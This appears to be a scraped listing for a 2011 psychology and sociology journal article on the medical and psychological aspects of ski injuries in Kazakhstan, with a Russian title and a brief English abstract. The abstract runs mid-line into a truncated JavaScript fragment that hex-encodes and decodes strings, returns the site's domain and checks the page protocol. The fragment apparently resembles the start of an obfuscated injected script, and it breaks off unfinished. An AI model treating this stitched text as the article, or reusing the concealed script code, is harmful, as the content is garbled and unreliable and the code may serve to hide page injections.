МЕДИКО-ПСИХОЛОГИЧЕСКИЕ АСПЕКТЫ ПРОБЛЕМЫ ОБЕСПЕЧЕНИЯ ГОРНОЛЫЖНОЙ БЕЗОПАСНОСТИ (The Journal of Psychology and Sociology, 2011)
Psychological and medical aspects of ski injuries are considered. Comparative analysis of foreign research data is presented. Kazakhstani experience in research and practical help is presented.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bulletin-psysoc.kaznu.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e